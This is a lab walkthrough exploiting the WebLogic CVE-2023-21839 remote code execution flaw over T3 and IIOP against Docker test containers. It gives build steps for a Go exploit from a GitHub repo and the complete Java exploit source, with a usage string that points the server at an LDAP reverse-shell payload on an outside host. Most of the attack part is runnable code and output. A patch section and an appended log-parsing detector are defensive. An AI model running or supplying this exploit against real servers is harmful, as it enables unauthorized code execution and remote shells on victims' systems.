WebLogic - CVE-2023-21839

WebLogic CVE-2023-21839: RCE over T3 and IIOP

Test Data

Version    Docker Image                                                 Status
14.1.1.0   container-registry.oracle.com/middleware/weblogic:14.1.1.0   Vulnerable
12.2.1.4   container-registry.oracle.com/middleware/weblogic:12.2.1.4   Vulnerable
12.2.1.3   container-registry.oracle.com/middleware/weblogic:12.2.1.3   Vulnerable
12.2.1.3   vulhub/weblogic:12.2.1.3                                     Vulnerable
12.2.1.3   vulhub/weblogic:12.2.1.3-2018                                Vulnerable
10.3.6.0   vulhub/weblogic:10.3.6.0-2017                                Vulnerable

Golang - IIOP

IIOP (Internet Inter-ORB Protocol) is the TCP/IP mapping of the GIOP protocol; it lets CORBA objects communicate and interact over the Internet.

RMI-IIOP is an implementation of Java Remote Method Invocation (RMI) on top of IIOP, extending the protocol with remote invocation of Java objects.

  1. No Java dependency is required: the protocol is constructed directly over a socket and the RCE is triggered from there.

  2. The IIOP NAT problem is handled, so Docker and public-network targets can be tested.

  3. Tested on Windows, macOS and Linux against WebLogic 12 and 14.

  4. Start WebLogic with JDK 8u191 or below and run your own JNDI server (later JDKs disable remote class loading from LDAP references by default).

Exploiting VulnHub 12.2.1.3-2018

» docker pull vulhub/weblogic:12.2.1.3-2018
» docker run -d -p 7001:7001 -p 9002:9002 --name weblogic-vulnhub-12213-2018 --hostname weblogic-vulnhub-12213-2018 --ulimit nofile=1024:65536 -v $PWD:/u01/oracle/properties vulhub/weblogic:12.2.1.3-2018
» docker container ls
CONTAINER ID   IMAGE                           COMMAND                  CREATED             STATUS             PORTS                                                                                  NAMES
bc98f59ca86d   vulhub/weblogic:12.2.1.3-2018   "/u01/oracle/createA…"   About an hour ago   Up About an hour   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   weblogic-vulnhub-12213-2018

» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 7:28:10,575 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.runtime.> 
<Oct 7, 2024 7:28:10,722 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.domainruntime.> 
<Oct 7, 2024 7:28:10,728 AM GMT> <Notice> <JMX> <BEA-149512> <JMX Connector Server started at service:jmx:iiop://172.17.0.2:7001/jndi/weblogic.management.mbeanservers.edit.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <WebLogicServer> <BEA-000331> <Started the WebLogic Server Administration Server "AdminServer" for domain "base_domain" running in development mode.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.> 
<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.> 
<Oct 7, 2024 7:28:11,565 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols iiop, t3, ldap, snmp, http.> 

» nmap -Pn -n -p7001 127.0.0.1 -sC
PORT     STATE SERVICE
7001/tcp open  afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.3)

Clone the repo and build the exploit:

apt :: ~ » git clone https://github.com/0xPThree/WebLogic
apt :: ~ » cd WebLogic/cve-2023-21839/cmd 
apt :: WebLogic/cve-2023-21839/cmd ‹main› » go build -o CVE-2023-21839
apt :: WebLogic/cve-2023-21839/cmd ‹main*› » ls -al
total 2964
drwxrwxr-x 2 void void    4096 Oct  7 11:07 .
drwxrwxr-x 3 void void    4096 Oct  7 11:07 ..
-rwxrwxr-x 1 void void 3009295 Oct  7 11:07 CVE-2023-21839
-rw-rw-r-- 1 void void   11475 Oct  7 11:07 main.go

Run the exploit:

Response in Burp Collaborator:

Running the exploit against a patched target gives the following error:

A panic or any other error means the target is not vulnerable. In this example it is because IIOP is disabled.


Java - T3

WebLogic's implementation of the RMI specification uses a proprietary protocol known as T3. You can think of T3 (and its TLS variant, T3S) as the layer that exposes JNDI calls to clients.

T3 is the protocol used to transport information between WebLogic servers and other kinds of Java programs.

Exploiting from the WebLogic 12.2.1.4 container

## Create base file (wlfullclient.jar)
[oracle@12214-weblogic lib]$ java -jar /u01/oracle/wlserver/modules/com.bea.core.jarbuilder.jar
Creating new jar file: wlfullclient.jar

## Upload payload to container
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/CVE_2023_21839.java
[oracle@12214-weblogic lib]$ curl -OL http://172.17.0.1/META-INF/MANIFEST.MF
[oracle@12214-weblogic lib]$ mkdir META-INF
[oracle@12214-weblogic lib]$ mv MANIFEST.MF META-INF/

## Create .class file
[oracle@12214-weblogic lib]$ mv wlfullclient.jar CVE_2023_21839.jar
[oracle@12214-weblogic lib]$ javac -cp CVE_2023_21839.jar CVE_2023_21839.java
[oracle@12214-weblogic lib]$ ls | grep CVE_2023_21839
CVE_2023_21839.class
CVE_2023_21839.jar
CVE_2023_21839.java

## Update base file with payload
[oracle@12214-weblogic lib]$ jar -uvf CVE_2023_21839.jar CVE_2023_21839.class
[oracle@12214-weblogic lib]$ jar -uvfm CVE_2023_21839.jar META-INF/MANIFEST.MF

## Execute exploit
[oracle@12214-weblogic lib]$ java -jar CVE_2023_21839.jar localhost:7001 ldap://zmpnx0cd2tzgorszf6mmfdt21t7kvkj9.oastify.com

## Java version
[oracle@12214-weblogic lib]$ java -version
java version "1.8.0_411"
Java(TM) SE Runtime Environment (build 1.8.0_411-b60)
Java HotSpot(TM) 64-Bit Server VM (build 25.411-b60, mixed mode)
// CVE_2023_21839.java
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import weblogic.deployment.jms.ForeignOpaqueReference;

public class CVE_2023_21839 {
  static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";

  static String HOW_TO_USE = "[*] e.g. java -jar CVE_2023_21839.jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

  // Open a T3 JNDI context against the target; needs the WebLogic client classes (wlfullclient.jar) on the classpath.
  private static InitialContext getInitialContext(String url) throws NamingException {
    Hashtable<String, String> env = new Hashtable<>();
    env.put("java.naming.factory.initial", JNDI_FACTORY);
    env.put("java.naming.provider.url", url);
    return new InitialContext(env);
  }

  public static void main(String[] args) throws Exception {
    if (args.length < 2) {
      System.out.println(HOW_TO_USE);
      System.exit(0);
    }
    String t3Url = args[0];
    String ldapUrl = args[1];
    InitialContext c = getInitialContext("t3://" + t3Url);
    // ForeignOpaqueReference resolves its remoteJNDIName on the server side when it is looked up;
    // the unchecked remote name is the sink behind CVE-2023-21839.
    Hashtable<String, String> env = new Hashtable<>();
    env.put("java.naming.factory.initial", "com.sun.jndi.rmi.registry.RegistryContextFactory");
    ForeignOpaqueReference f = new ForeignOpaqueReference();
    Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
    jndiEnvironment.setAccessible(true);
    jndiEnvironment.set(f, env);
    Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
    remoteJNDIName.setAccessible(true);
    remoteJNDIName.set(f, ldapUrl);
    // Bind the reference under a random name, then look it up to make the server dereference it.
    String bindName = (new Random(System.currentTimeMillis())).nextLong() + "";
    try {
      c.bind(bindName, f);
      c.lookup(bindName);
    } catch (Exception exception) {
      // Exceptions after the server-side lookup are expected and deliberately ignored.
    }
  }
}
// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Main-Class: CVE_2023_21839
Class-Path: CVE_2023_21839

Exploiting from the host

I am unable to use this exploit from my host system. I assume it's because of the Java version and/or dependencies.

[oracle@12214-weblogic lib]$ python -m SimpleHTTPServer 8080
» curl -OL http://172.17.0.6:8080/CVE_2023_21839.jar

» java -jar CVE_2023_21839.jar localhost:7009 ldap://zmpnx0cd2tzgorszf6mmfdt21t7kvkj9.oastify.com
...
Timed out while attempting to establish connection to :t3://localhost:7009 [Root exception is java.io.IOException: Timed out while attempting to establish connection to :t3://localhost:7009]

» java --version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk 21.0.5-ea 2024-10-15
OpenJDK Runtime Environment (build 21.0.5-ea+8-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.5-ea+8-Debian-1, mixed mode, sharing)

Patch

The easiest way to mitigate this is by disabling IIOP in the WebLogic Console.

Servers > Control > AdminServer > Protocols > IIOP > Uncheck "Enable IIOP"

Restart the WebLogic Server for the change to take effect. Note that this only closes the IIOP vector: the Java exploit above goes over T3, which this setting does not touch, so T3 access should also be restricted (for example with a WebLogic network connection filter) and Oracle's Critical Patch Update applied.

[oracle@weblogic-vulnhub-12213-2018 bin]$ ./stopWebLogic.sh
[oracle@weblogic-vulnhub-12213-2018 bin]$ ./startWebLogic.sh 

Running the exploit again now gives the following error:

Reading the logs we can see that the connection was rejected "because the incoming protocol iiop is not enabled", so the IIOP attack vector has been eliminated.

» docker container logs weblogic-vulnhub-12213-2018
...
<Oct 7, 2024 8:51:07,332 AM GMT> <Warning> <Socket> <BEA-000443> <The connection attempt was rejected because the incoming protocol iiop is not enabled on channel Default[iiop].>
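As an added verification check (not part of the original page or the exploit repo), the following Go program parses WebLogic server log lines like the ones quoted above: it reports which channels still advertise iiop (the mitigation has not taken effect there) and counts BEA-000443 rejections, which show that someone attempted IIOP after it was disabled and are worth alerting on. The sample lines are constructed from the messages shown on this page.

```go
package main

import (
	"regexp"
	"strings"
)

// Constructed sample input modelled on the server log lines quoted on this page:
// a channel still offering iiop, a rejected iiop attempt, and a channel without iiop.
const sampleLog = `<Oct 7, 2024 7:28:11,564 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default" is now listening on 172.17.0.2:7001 for protocols iiop, t3, ldap, snmp, http.>
<Oct 7, 2024 8:51:07,332 AM GMT> <Warning> <Socket> <BEA-000443> <The connection attempt was rejected because the incoming protocol iiop is not enabled on channel Default[iiop].>
<Oct 7, 2024 9:00:00,000 AM GMT> <Notice> <Server> <BEA-002613> <Channel "Default[1]" is now listening on 127.0.0.1:7001 for protocols t3, ldap, snmp, http.>`

// Report summarises what a server log says about IIOP exposure.
type Report struct {
	Channels     int               // BEA-002613 "is now listening" records seen
	IIOPExposed  map[string]string // channel name -> listen address, for channels still advertising iiop
	RejectedIIOP int               // BEA-000443 rejections: IIOP was attempted after being disabled
}

var (
	listenRe = regexp.MustCompile(`<BEA-002613> <Channel "([^"]+)" is now listening on (\S+) for protocols ([^.]+)\.>`)
	rejectRe = regexp.MustCompile(`<BEA-000443> <.*incoming protocol iiop is not enabled`)
)

// Analyze scans WebLogic server log text; a non-empty IIOPExposed means the
// mitigation from the Patch section has not taken effect on that channel.
func Analyze(log string) Report {
	r := Report{IIOPExposed: map[string]string{}}
	for _, line := range strings.Split(log, "\n") {
		if m := listenRe.FindStringSubmatch(line); m != nil {
			r.Channels++
			for _, p := range strings.Split(m[3], ",") {
				if strings.TrimSpace(p) == "iiop" {
					r.IIOPExposed[m[1]] = m[2]
				}
			}
		} else if rejectRe.MatchString(line) {
			r.RejectedIIOP++
		}
	}
	return r
}

// Mitigated reports whether the log shows startup channels and none of them still offers iiop.
func Mitigated(r Report) bool { return r.Channels > 0 && len(r.IIOPExposed) == 0 }
```

Feed it the output of `docker container logs` after the restart; a clean result is `Mitigated` true with `RejectedIIOP` at zero, and a rising `RejectedIIOP` afterwards is an indicator of continued probing.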
